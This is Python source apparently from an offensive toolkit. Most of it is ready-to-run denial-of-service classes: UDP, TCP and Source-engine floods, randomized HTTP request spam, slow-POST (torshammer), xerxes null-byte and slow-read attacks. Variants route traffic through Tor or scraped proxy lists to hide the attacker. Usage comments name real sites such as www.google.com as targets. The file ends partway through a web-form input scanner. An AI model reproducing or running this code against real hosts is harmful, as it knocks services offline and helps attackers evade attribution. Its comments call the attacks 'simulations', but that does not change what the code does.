import requests,cfscrape,socks,os,sys,urllib,socket,random,time,threading,ssl
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
#import the dependencies for each python version
if  sys.version_info < (3,0):
    # Python 2.x
    import httplib
    import urllib2
    from scapy.config import conf
    conf.ipv6_enabled = False
    from scapy.all import *
else:
    # Python 3.x
    import http.client
    httplib = http.client
    import urllib.request
    urllib2=urllib.request
    from kamene.config import conf
    conf.ipv6_enabled = False
    from kamene.all import *
from struct import *
from bane.iot import getip
from bane.payloads import *
from bane.proxer import *
if os.path.isdir('/data/data')==True:
    adr=True#the device is an android
if os.path.isdir('/data/data/com.termux/')==True:
    termux=True#the application which runs the module is Termux
if ((termux==False) or (adr==False)):
 from bane.swtch import *



def reorder_headers_randomly(s):
 b=s.split('\r\n\r\n')[1]
 a=s.split('\r\n\r\n')[0]
 m=a.split('\r\n')[0]
 c=a.split('\r\n')[1:]
 random.shuffle(c)
 return m+"\r\n"+"\r\n".join(c)+'\r\n\r\n'+b


def random_param():
 a=random.randint(1,2)
 if a==1:
  return str(random.randint(1,1000))
 else:
  return random.choice(lis)

def setup_http_packet(target,ty,paths,post_field_min,post_field_max,post_min,post_max,cookie,user_agents):
      pa=random.choice(paths)#bypassing cache engine
      q=''
      for i in range(random.randint(2,5)):
       q+=random_param()+random_param()
      p=''
      for i in range(random.randint(2,5)):
       p+=random_param()+random_param()
      if '?' in pa:
       jo='&'
      else:
       jo='?' 
      pa+=jo+q+"="+p
      #setting random headers
      for l in range(random.randint(1,5)):
       ed=random.choice(ec)
       oi=random.randint(1,3)
       if oi==2:
        gy=0
        while gy<1:
         df=random.choice(ec)
         if df!=ed:
          gy+=1
        ed+=', '
        ed+=df
      l=random.choice(al)
      for n in range(random.randint(0,5)):
       l+=';q={},'.format(round(random.uniform(.1,1),1))+random.choice(al)
      kl=random.randint(1,2)
      ck=""
      if cookie:
       ck="Cookie: "+cookie+"\r\n"
      if ty==1:
       m='GET {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept: {}\r\nAccept-Language: {}\r\nAccept-Encoding: {}\r\nAccept-Charset: {}\r\nKeep-Alive: {}\r\nConnection: Keep-Alive\r\nCache-Control: {}\r\nReferer: {}\r\nHost: {}\r\n\r\n'.format(pa,ck,random.choice(user_agents),random.choice(a),l,ed,random.choice(ac),random.randint(100,1000),random.choice(cc),(random.choice(referers)+random.choice(lis)+str(random.randint(0,100000000))+random.choice(lis)),target)
      else:
       k=''
       for _ in range(random.randint(post_field_min,post_field_max)):
        k+=random.choice(lis)
       j=''
       for x in range(random.randint(post_min,post_max)):
        j+=random.choice(lis)
       par =k+'='+j
       m= "POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: {}\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n{}".format(pa,ck,random.choice(user_agents),l,random.randint(300,1000),len(par),(random.choice(referers)+random.choice(lis)+str(random.randint(0,100000000))+random.choice(lis)),target,par)
      return reorder_headers_randomly(m)

def get_public_dns(timeout=15):
 try:
  return (requests.get('https://public-dns.info/nameservers.txt',timeout=timeout).text).split('\n')
 except:
  return []



def reset():#reset all values
 global counter
 counter=0
 global stop
 stop=False
 global coo
 coo=False
 global ual
 ual=[]
 global flag
 flag=-1
 global ier
 ier=0
 global pointer
 pointer=0
 global ue
 ue=[]
 
'''
   the following classes are for DoS attacks simulations with different tools that have been either originally written in 
   diffferent languages (Perl: slowloris and C: xerxes and slow_read attack...) and rewritten in python and other python tools that are PoC for 
   some vulnerabilities (slow post attacks, hulk) with some modifications that has improved their performance!!!
'''

class udp_flood:
 def __init__(self,u,p=80,threads_daemon=True,interval=0.001,min_size=10,max_size=10,connection=True,duration=60,threads=1,limiting=True,logs=False):
  self.target=u
  self.port=p
  self.interval=interval
  self.min_size=min_size
  self.max_size=max_size
  self.connection=connection
  self.duration=duration
  self.limiting=limiting
  self.logs=logs
  self.stop=False
  self.counter=0
  self.start=time.time()
  for x in range(threads):
   t=threading.Thread(target=self.attack)
   t.daemon=threads_daemon
   t.start()
 def attack(self):
  try:
   time.sleep(1)
   tm=time.time()
   size=0
   while True:
    if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
     break
    if self.stop==True:
     break
    try:
     s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
     if self.connection==True:
      s.connect((self.target,self.port))
     msg=''
     for x in range(random.randint(self.min_size,self.max_size)):
      msg+=random.choice(lis)
     if len(msg)>1400:
       msg=msg[0:1400]#make sure all payloads' sizes are on the right range
     s.sendto((msg.encode('utf-8')),(self.target,self.port))
     size+=len(msg)
     self.counter+=1
     if((self.logs==True) and (int(time.time()-tm)==1)):
      sys.stdout.write("\rPackets: {} | Bytes/s: {}   ".format(self.counter,size))
      sys.stdout.flush()
      tm=time.time()
      size=0
     if self.limiting==True:
      time.sleep(self.interval)
    except:
     try:
      time.sleep(self.interval)
     except:
      pass
   self.kill() 
  except:
    pass
 def done(self):
  if 'stop' in dir(self):
   return False
  return True
 def reset(self):
   l=[]
   for x in self.__dict__:
    self.__dict__[x]=None
    l.append(x)
   for x in l:
    delattr(self,x)
 def kill(self):
  self.stop=True
  a=self.__dict__["counter"]
  self.reset()#this will kill any running threads instantly by setting all the attacking information to "None" and cause error which is handled with the "try...except..." around the main while loop
  return a
  
class vse_flood:
 def __init__(self,u,p=80,threads_daemon=True,interval=0.001,connection=True,duration=60,threads=1,limiting=True,logs=False):
  self.target=u
  self.port=p
  self.payload=b'\xff\xff\xff\xffTSource Engine Query\x00' # read more at https://developer.valvesoftware.com/wiki/Server_queries
  self.interval=interval
  self.connection=connection
  self.duration=duration
  self.limiting=limiting
  self.logs=logs
  self.stop=False
  self.counter=0
  self.start=time.time()
  for x in range(threads):
   t=threading.Thread(target=self.attack)
   t.daemon=threads_daemon
   t.start()
 def attack(self):
  try:
   time.sleep(1)
   tm=time.time()
   while True:
    if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
     break
    if self.stop==True:
     break
    try:
     s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
     if self.connection==True:
      s.connect((self.target,self.port))
     s.sendto(self.payload,(self.target,self.port))
     self.counter+=1
     if((self.logs==True) and (int(time.time()-tm)==1)):
      sys.stdout.write("\rPackets: {}   ".format(self.counter))
      sys.stdout.flush()
      tm=time.time()
     if self.limiting==True:
      time.sleep(self.interval)
    except:
     pass
     try:
      time.sleep(self.interval)
     except:
      pass
   self.kill()
  except:
   pass
 def done(self):
  if 'stop' in dir(self):
   return False
  return True
 def reset(self):
   l=[]
   for x in self.__dict__:
    self.__dict__[x]=None
    l.append(x)
   for x in l:
    delattr(self,x)
 def kill(self):
  if 'stop' in dir(self):
   self.stop=True
   a=self.__dict__["counter"]
   self.reset()
   return a



class tcp_flood:
 def __init__(self,u,p=80,threads_daemon=True,min_size=10,max_size=50,threads=256,timeout=5,round_min=50,round_max=150,interval=0.001,duration=60,logs=False,tor=False):
  self.logs=logs
  self.stop=False
  self.counter=0
  self.start=time.time()
  self.target=u
  self.duration=duration
  self.port=p
  self.timeout=timeout
  self.tor=tor
  self.min_size=min_size
  self.max_size=max_size
  self.interval=interval
  self.round_min=round_min
  self.round_max=round_max
  for x in range(threads):
   t=threading.Thread(target=self.attack)
   t.daemon=threads_daemon
   t.start()
 def attack(self):
  try:
   time.sleep(1)#give time for all threads to be created
   while True:
    if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
     break
    if self.stop==True:
     break
    try:
     s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
     if self.tor==False:
      s.settimeout=(self.timeout)#we can't set timeout with socks module if we are going to use a socks proxy
     if self.tor==True:
      s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)#let the traffic go through tor
     s.connect((self.target,self.port))#connect to target 
     if (self.port==443) or (self.port==8443):
       s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)#use ssl if needed on specific ports
     for l in range(random.randint(self.round_min,self.round_max)):#send packets with random number of times for each connection (number between "round_min" and "round_max")
      if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
       break
      if stop==True:
       break
      m=''
      for li in range(random.randint(self.min_size,self.max_size)): #each payload' size is chosen randomly between maximum and minimum values
       m+=random.choice(lis)
      try:
       if stop==True:
        break
       s.send(m.encode('utf-8'))
       self.counter+=1
       if self.logs==True:
        sys.stdout.write("\rPackets: {} | Bytes: {}   ".format(self.counter,len(m)))
        sys.stdout.flush()
        #print("Packets: {} | Bytes: {}".format(tcp_counter,len(m)))
      except:
       break
      time.sleep(self.interval)
     s.close()
    except:
     pass
    time.sleep(.1)
   self.kill()
  except:
   pass
 def done(self):
  if 'stop' in dir(self):
   return False
  return True
 def reset(self):
   l=[]
   for x in self.__dict__:
    self.__dict__[x]=None
    l.append(x)
   for x in l:
    delattr(self,x)
 def kill(self):
  if 'stop' in dir(self):
   self.stop=True
   a=self.__dict__["counter"]
   self.reset()
   return a
 
'''
  usage:

  >>>bane.tcp_flood('www.google.com')

  >>>bane.tcp_flood('www.google.com',p=80, threads=150, timeout=5)

  p: (set by default to: 80) targeted port
  threads: (set by default to: 256) threads to use
  timeout: (set by default to: 5) timeout flag
'''



class http_spam:
 def __init__(self,u,p=80,cookie=None,user_agents=None,method=3,threads_daemon=True,paths=["/"],threads=256,post_min=5,post_max=10,post_field_max=100,post_field_min=50,timeout=5,round_min=50,round_max=150,interval=0.001,duration=60,logs=False,tor=False):
  self.logs=logs
  self.cookie=cookie
  self.user_agents=user_agents
  if not self.user_agents or len(self.user_agents)==0:
   self.user_agents=ua
  self.method=method
  self.stop=False
  self.counter=0
  self.start=time.time()
  self.target=u
  self.duration=duration
  self.port=p
  self.timeout=timeout
  self.tor=tor
  self.interval=interval
  self.round_min=round_min
  self.round_max=round_max
  self.paths=paths
  self.post_min=post_min
  self.post_max=post_max
  self.post_field_max=post_field_max
  self.post_field_min=post_field_min
  for x in range(threads):
   t=threading.Thread(target=self.attack)
   t.daemon=threads_daemon
   t.start()
 def attack(self):
  try:
   time.sleep(1)
   while True:
    if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
     break
    if self.stop==True:
      break
    try:
     s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
     if self.tor==False:
      s.settimeout=(self.timeout)
     if self.tor==True:
      s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)
     s.connect((self.target,self.port))
     if ((self.port==443) or (self.port==8443)):
      s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
     for l in range(random.randint(self.round_min,self.round_max)):
      if self.method==3:
       ty=random.randint(1,2)
      else:
       ty=self.method
      if ty==1:
       req="GET"
      else:
       req="POST"
      m=setup_http_packet(self.target,ty,self.paths,self.post_field_min,self.post_field_max,self.post_min,self.post_max,self.cookie,self.user_agents)
      try:
       if self.stop==True:
         break
       s.send(m.encode('utf-8'))
       self.counter+=1
       if self.logs==True:
        sys.stdout.write("\rRequest: {} | Type: {} | Bytes: {}   ".format(self.counter,req,len(m)))
        sys.stdout.flush()
        #print("Request: {} | Type: {} | Bytes: {}".format(http_counter,req,len(m)))
      except:
       break
      time.sleep(self.interval)
     s.close()
    except:
     pass
    time.sleep(.1)
   self.kill()
  except:
   pass
 def done(self):
  if 'stop' in dir(self):
   return False
  return True
 def reset(self):
   l=[]
   for x in self.__dict__:
    self.__dict__[x]=None
    l.append(x)
   for x in l:
    delattr(self,x)
 def kill(self):
  if 'stop' in dir(self):
   self.stop=True
   a=self.__dict__["counter"]
   self.reset()
   return a


class prox_http_spam:
 def __init__(self,u,p=80,cookie=None,user_agents=None,method=3,threads_daemon=True,scraping_timeout=15,http_list=None,socks4_list=None,socks5_list=None,paths=["/"],threads=256,post_min=5,post_max=10,post_field_max=100,post_field_min=50,timeout=5,round_min=50,round_max=150,interval=0.001,duration=60,logs=False):
  self.logs=logs
  self.cookie=cookie
  self.user_agents=user_agents
  if not self.user_agents or len(self.user_agents)==0:
   self.user_agents=ua
  self.method=method
  self.stop=False
  self.counter=0
  self.httplist=http_list
  if not self.httplist and self.httplist!=[]:
   self.httplist=masshttp(timeout=scraping_timeout)
  self.socks4list=socks4_list
  if not self.socks4list and self.socks4list!=[] :
   self.socks4list=massocks4(timeout=scraping_timeout)
  self.socks5list=socks5_list
  if not self.socks5list and self.socks5list!=[]:
   self.socks5list=massocks5(timeout=scraping_timeout)
  self.start=time.time()
  self.target=u
  self.duration=duration
  self.port=p
  self.timeout=timeout
  self.tor=tor
  self.interval=interval
  self.round_min=round_min
  self.round_max=round_max
  self.paths=paths
  self.post_min=post_min
  self.post_max=post_max
  self.post_field_max=post_field_max
  self.post_field_min=post_field_min
  for x in range(threads):
   t=threading.Thread(target=self.attack)
   t.daemon=threads_daemon
   t.start()
 def attack(self):
  try:
   time.sleep(1)
   while True:
    if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
     break
    if self.stop==True:
     break
    try:
     bot_type=[]
     if len(self.httplist)>0:
      bot_type.append("h")
     if len(self.socks4list)>0:
      bot_type.append("s4")
     if len(self.socks5list)>0:
      bot_type.append("s5")
     z=random.choice(bot_type)
     if z=="h":
      line=random.choice(self.httplist)
     elif z=="s4":
      line=random.choice(self.socks4list)
     elif z=="s5":
      line=random.choice(self.socks5list)
     ipp=line.split(":")[0].split("=")[0]
     pp=line.split(":")[1].split("=")[0]
     s =socks.socksocket()
     if z=="h":
      s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
     elif z=="s4":
      s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
     elif z=="s5":
      s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
     if z=="h":
      s.settimeout(self.timeout)
     s.connect((self.target,self.port))
     if ((self.port==443) or (self.port==8443)):
      s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
     for l in range(random.randint(self.round_min,self.round_max)):
      if self.method==3:
       ty=random.randint(1,2)
      else:
       ty=self.method
      if ty==1:
       req="GET"
      else:
       req="POST"
      m=setup_http_packet(self.target,ty,self.paths,self.post_field_min,self.post_field_max,self.post_min,self.post_max,self.cookie,self.user_agents)
      try:
       if stop==True:
         break
       s.send(m.encode('utf-8'))
       self.counter+=1
       if self.logs==True:
        sys.stdout.write("\rBot: {} | Request: {} | Type: {} | Bytes: {}   ".format(ipp,self.counter,req,len(m)))
        sys.stdout.flush()
        #print("Bot: {} | Request: {} | Type: {} | Bytes: {}".format(ipp,lulzer_counter,req,len(m)))
      except:
       break
      time.sleep(self.interval)
     s.close()
    except:
     pass
    time.sleep(.1)
   self.kill()
  except:
   pass
 def done(self):
  if 'stop' in dir(self):
   return False
  return True
 def reset(self):
   l=[]
   for x in self.__dict__:
    self.__dict__[x]=None
    l.append(x)
   for x in l:
    delattr(self,x)
 def kill(self):
  if 'stop' in dir(self):
   self.stop=True
   a=self.__dict__["counter"]
   self.reset()
   return a


class torshammer:
 def __init__(self,u,p=80,cookie=None,user_agents=None,threads_daemon=True,threads=500,timeout=5,tor=False,duration=60,logs=False,max_content=15000,min_content=10000):
  self.counter=0
  self.cookie=cookie
  self.user_agents=user_agents
  if not self.user_agents or len(self.user_agents)==0:
   self.user_agents=ua
  self.max_content=max_content
  self.min_content=min_content
  self.stop=False
  self.start=time.time()
  self.target=u
  self.duration=duration
  self.port=p
  self.timeout=timeout
  self.tor=tor
  self.logs=logs
  for x in range(threads):
   t=threading.Thread(target=self.attack)
   t.daemon=threads_daemon
   t.start()
 def attack(self):
  try:
   time.sleep(1)
   while True:
    if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
     break
    if self.stop==True:
     break
    try:
     s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
     if self.tor==False:
      s.settimeout(self.timeout)
     if self.tor==True:
      s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)
     s.connect((self.target,self.port))
     if ((self.port==443) or (self.port==8443)):
      s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
     self.counter+=1
     if self.logs==True:
        sys.stdout.write("\rConnected to {}:{}...".format(self.target,self.port))
        sys.stdout.flush()
        #print("Connected to {}:{}...".format(self.target,self.port))
     q=random.randint(self.min_content,self.max_content)
     ck=""
     if self.cookie:
      ck="Cookie: "+self.cookie+"\r\n"
     s.send(reorder_headers_randomly("POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(random.choice(paths),ck,random.choice(self.user_agents),random.randint(300,1000),q,(random.choice(referers)+random.choice(lis)+str(random.randint(0,100000000))+random.choice(lis)),self.target)).encode('utf-8'))
     for i in range(q):
      if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
       break
      if self.stop==True:
       break
      h=random.choice(lis)
      try:
       s.send(h.encode('utf-8'))
       if self.logs==True:
        sys.stdout.write("\rPosted: {}".format(h))
        sys.stdout.flush()
        #print("Posted: {}".format(h))
       time.sleep(random.uniform(.1,3))
      except:
       break
     s.close()
    except:
     pass
    self.counter-=1
    time.sleep(.1)
    if self.stop==True:
     break
   self.kill()
  except:
   pass
 def done(self):
  if 'stop' in dir(self):
   return False
  return True
 def reset(self):
   l=[]
   for x in self.__dict__:
    self.__dict__[x]=None
    l.append(x)
   for x in l:
    delattr(self,x)
 def kill(self):
  if 'stop' in dir(self):
   self.stop=True
   a=self.__dict__["counter"]
   self.reset()
   return a



class prox_hammer:
 def __init__(self,u,p=80,cookie=None,user_agents=None,threads_daemon=True,scraping_timeout=15,max_content=15000,min_content=10000,threads=700,timeout=5,http_list=None,socks4_list=None,socks5_list=None,duration=60,logs=True):
  self.cookie=cookie
  self.user_agents=user_agents
  if not self.user_agents or len(self.user_agents)==0:
   self.user_agents=ua
  self.httplist=http_list
  if not self.httplist and self.httplist!=[]:
   self.httplist=masshttp(timeout=scraping_timeout)
  self.socks4list=socks4_list
  if not self.socks4list and self.socks4list!=[] :
   self.socks4list=massocks4(timeout=scraping_timeout)
  self.socks5list=socks5_list
  if not self.socks5list and self.socks5list!=[]:
   self.socks5list=massocks5(timeout=scraping_timeout)
  self.stop=False
  self.start=time.time()
  self.target=u
  self.duration=duration
  self.port=p
  self.timeout=timeout
  self.max_content=max_content
  self.min_content=min_content
  self.logs=logs
  self.counter=0
  for x in range(threads):
   t=threading.Thread(target=self.attack)
   t.daemon=threads_daemon
   t.start()
 def attack(self):
  try:
   time.sleep(1)
   while True:
    if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
     break
    if self.stop==True:
     break
    try:
     bot_type=[]
     if len(self.httplist)>0:
      bot_type.append("h")
     if len(self.socks4list)>0:
      bot_type.append("s4")
     if len(self.socks5list)>0:
      bot_type.append("s5")
     z=random.choice(bot_type)
     if z=="h":
      line=random.choice(self.httplist)
     elif z=="s4":
      line=random.choice(self.socks4list)
     elif z=="s5":
      line=random.choice(self.socks5list)
     ipp=line.split(":")[0].split("=")[0]
     pp=line.split(":")[1].split("=")[0]
     s =socks.socksocket()
     if z=="h":
      s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
     elif z=="s4":
      s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
     elif z=="s5":
      s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
     if z=="h":
      s.settimeout(self.timeout)
     s.connect((self.target,self.port))
     self.counter+=1
     if ((self.port==443)or(self.port==8443)):
      s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
     q=random.randint(self.min_content,self.max_content)
     ck=""
     if self.cookie:
      ck="Cookie: "+cookie+"\r\n"
     s.send(reorder_headers_randomly("POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(random.choice(paths),ck,random.choice(self.user_agents),random.randint(300,1000),q,(random.choice(referers)+random.choice(lis)+str(random.randint(0,100000000))+random.choice(lis)),self.target)).encode('utf-8'))
     for i in range(q):
      if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
       break
      if self.stop==True:
       break
      h=random.choice(lis)
      try:
       s.send(h.encode('utf-8'))
       if self.logs==True:
        sys.stdout.write("\rPosted: {} --> {}".format(h,ipp))
        sys.stdout.flush()
        #print("Posted: {} --> {}".format(h,ipp))
       time.sleep(random.uniform(.1,3))
      except:
       break
     s.close()
    except:
     pass
    self.counter-=1
    time.sleep(.1)
   self.kill()
  except:
   pass
 def done(self):
  if 'stop' in dir(self):
   return False
  return True
 def reset(self):
   l=[]
   for x in self.__dict__:
    self.__dict__[x]=None
    l.append(x)
   for x in l:
    delattr(self,x)
 def kill(self):
  if 'stop' in dir(self):
   self.stop=True
   a=self.__dict__["counter"]
   self.reset()
   return a


class xerxes:
 def __init__(self,u,p=80,threads_daemon=True,threads=500,timeout=5,duration=60,logs=False,tor=False):
  self.counter=0
  self.target=u
  self.port=p
  self.stop=False
  self.duration=duration
  self.timeout=timeout
  self.tor=tor
  self.start=time.time()
  self.logs=logs
  self.id_key=0
  for x in range(threads):
   t=threading.Thread(target=self.attack)
   t.daemon=threads_daemon
   t.start()
   self.id_key+=1
 def attack(self):
  try:
   x=self.id_key
   time.sleep(1)
   while True:
    if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
     break
    if self.stop==True:
     break
    try:
     s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
     if self.tor==False:
      s.settimeout(self.timeout)
     if self.tor==True:
      s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)
     s.connect((self.target,self.port))
     self.counter+=1
     """if self.logs==True:
     #print("[Connected to {}:{}]".format(self.target,self.port))
     sys.stdout.write("\r[Connected to {}:{}]".format(self.target,self.port))
     sys.stdout.flush()"""
     while True:
      if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
       break
      if self.stop==True:
       break
      try:
       s.send("\x00".encode('utf-8'))#send NULL character
       if self.logs==True:
        sys.stdout.write("\r[{}: Voly sent]    ".format(x))
        sys.stdout.flush()
      except:
       break
      time.sleep(.2)
    except:
      pass
    self.counter-=1
    time.sleep(.3)
   self.kill()
  except:
   pass
 def done(self):
  if 'stop' in dir(self):
   return False
  return True
 def reset(self):
   l=[]
   for x in self.__dict__:
    self.__dict__[x]=None
    l.append(x)
   for x in l:
    delattr(self,x)
 def kill(self):
  if 'stop' in dir(self):
   self.stop=True
   a=self.__dict__["counter"]
   self.reset()
   return a


class prox_xerxes:
 def __init__(self,u,scraping_timeout=15,p=80,threads_daemon=True,threads=700,timeout=5,http_list=None,socks4_list=None,socks5_list=None,duration=60,logs=False):
  self.httplist=http_list
  if not self.httplist and self.httplist!=[]:
   self.httplist=masshttp(timeout=scraping_timeout)
  self.socks4list=socks4_list
  if not self.socks4list and self.socks4list!=[] :
   self.socks4list=massocks4(timeout=scraping_timeout)
  self.socks5list=socks5_list
  if not self.socks5list and self.socks5list!=[]:
   self.socks5list=massocks5(timeout=scraping_timeout)
  self.stop=False
  self.counter=0
  self.start=time.time()
  self.target=u
  self.duration=duration
  self.port=p
  self.timeout=timeout
  self.logs=logs
  self.id_key=0
  for x in range(threads):
   t=threading.Thread(target=self.attack)
   t.daemon=threads_daemon
   t.start()
   self.id_key+=1
 def attack(self):
  try:
   x=self.id_key
   time.sleep(1)
   while True:
    if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
     break
    if self.stop==True:
     break
    try:
     bot_type=[]
     if len(self.httplist)>0:
      bot_type.append("h")
     if len(self.socks4list)>0:
      bot_type.append("s4")
     if len(self.socks5list)>0:
      bot_type.append("s5")
     z=random.choice(bot_type)
     if z=="h":
      line=random.choice(self.httplist)
     elif z=="s4":
      line=random.choice(self.socks4list)
     elif z=="s5":
      line=random.choice(self.socks5list)
     ipp=line.split(":")[0].split("=")[0]
     pp=line.split(":")[1].split("=")[0]
     s =socks.socksocket()
     if z=="h":
      s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
     elif z=="s4":
      s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
     elif z=="s5":
      s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
     if z=="h":
      s.settimeout(self.timeout)
     s.connect((self.target,self.port))
     self.counter+=1
     while True:
      if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
       break
      if self.stop==True:
       break
      try:
       s.send("\x00".encode('utf-8'))#send NULL character
       if self.logs==True:
        sys.stdout.write("\r[{}: Voly sent-->{}]     ".format(x,ipp))
        sys.stdout.flush()
      except:
       break
      time.sleep(.2)
    except:
     pass
    self.counter-=1
    time.sleep(.3)
   self.kill()
  except:
   pass
 def done(self):
  if 'stop' in dir(self):
   return False
  return True
 def reset(self):
   l=[]
   for x in self.__dict__:
    self.__dict__[x]=None
    l.append(x)
   for x in l:
    delattr(self,x)
 def kill(self):
  if 'stop' in dir(self):
   self.stop=True
   a=self.__dict__["counter"]
   self.reset()
   return a
  
'''
   this tool is to perform slow reading attack. i read about this type of attacks on: https://blog.qualys.com/tag/slow-http-attack and tried to do the same thing in python (but in a better way though :p ). on this attack, the attacker is sending a full legitimate HTTP request but reading it slowly to keep the connection open as long as possible. here im doing it a bit different of the original attack with slowhttptest, im sending a normal HTTP request on each thread then read a small part of it (between 1 to 3 bytes randomly sized) then it sleeps for few seconds (3 to 5 seconds randomly sized too), then it sends another request and keep doing the same and keeping the connection open forever.

   it takes the following parameters:

   u: target ip or domain
   p: (set by default to: 80)
   threads: (set by default to: 500) number of connections
   timeout: (set by default to: 5) connection timeout flag 

   example:

   >>>import bane
   >>>bane.slow_read_attack('www.google.com',p=443,threads=300,timeout=7)

'''

class slow_read:
 def __init__(self,u,p=80,cookie=None,user_agents=None,paths=["/"],threads_daemon=True,threads=500,timeout=5,min_speed=3,max_speed=5,max_read=3,min_read=1,logs=False,tor=False,duration=60):
  self.counter=0
  self.cookie=cookie
  self.user_agents=user_agents
  if not self.user_agents or len(self.user_agents)==0:
   self.user_agents=ua
  self.stop=False
  self.target=u
  self.port=p
  self.paths=paths
  self.timeout=timeout
  self.tor=tor
  self.read_max=max_read
  self.read_min=min_read
  self.min_speed=min_speed
  self.max_speed=max_speed
  self.logs=logs
  self.duration=duration
  self.start=time.time()
  for x in range(threads):
   t=threading.Thread(target=self.attack)
   t.daemon=threads_daemon
   t.start()
 def attack(self):
  try:
   time.sleep(1)
   while True:
    if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
     break
    if self.stop==True:
     break
    try: 
     s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
     if self.tor==False:
      s.settimeout(self.timeout)
     if self.tor==True:
      s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)
     s.connect((self.target,self.port))
     if ((self.port==443)or(self.port==8443)):
      s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
     while True:
      if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
       break
      if self.stop==True:
       break
      try:
       s.send(setup_http_packet(self.target,3,self.paths,2,8,10,50,self.cookie,self.user_agents).encode('utf-8'))
       self.counter+=1
       while True:    
        d=s.recv(random.randint(self.read_min,self.read_max))
        if self.logs==True:
         sys.stdout.write("\rReceived: {}   ".format(str(d.decode('utf-8').strip())))
         sys.stdout.flush()
         #print("Received: {}".format(str(d.decode('utf-8'))))
       time.sleep(random.randint(self.min_speed,self.max_speed))
      except:
       break
     s.close()
    except:
     pass
   self.kill()
  except:
   pass
 def done(self):
  if 'stop' in dir(self):
   return False
  return True
 def reset(self):
   l=[]
   for x in self.__dict__:
    self.__dict__[x]=None
    l.append(x)
   for x in l:
    delattr(self,x)
 def kill(self):
  if 'stop' in dir(self):
   self.stop=True
   a=self.__dict__["counter"]
   self.reset()
   return a















"""


The rest of the DDoS tools have been removed and will be added slowly in the coming versions :) Be patient !!


"""


import requests,random,re,time,furl,sys
if  sys.version_info < (3,0):
 from urlparse import urlparse
else:
 from urllib.parse import urlparse
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import bs4
from bs4 import BeautifulSoup
from bane.payloads import *



def remove_html_comments(text):
 return re.sub(r"<!--(.|\s|\n)*?-->", "",text,flags=re.DOTALL)



def inputs(u,html_comments=False,value=False,timeout=10,user_agent=None,bypass=False,proxy=None,cookie=None):
 '''
   this function is to get the names and values of input fields on a given webpage to scan.

   it takes 4 arguments:

   u: the page's link (http://...)
   value: (set by default to: False) to return the value of the fields set it to:True then the field's name and value will be string of 2 
   values sperated by ":"
   timeout: (set by default to: 10) timeout flag for the request
   bypass: (set by default to: False) to bypass anti-crawlers

  usage:

  >>>import bane
  >>>link='http://www.example.com'
  >>>bane.inputs(link)
  ['email','password','rememberme']
  >>>a=bane.inputs(link,value=True)
  ['email','password','rememberme:yes','rememberme:no']
  
 '''
 if user_agent:
  us=user_agent
 else:
  us=random.choice(ua)
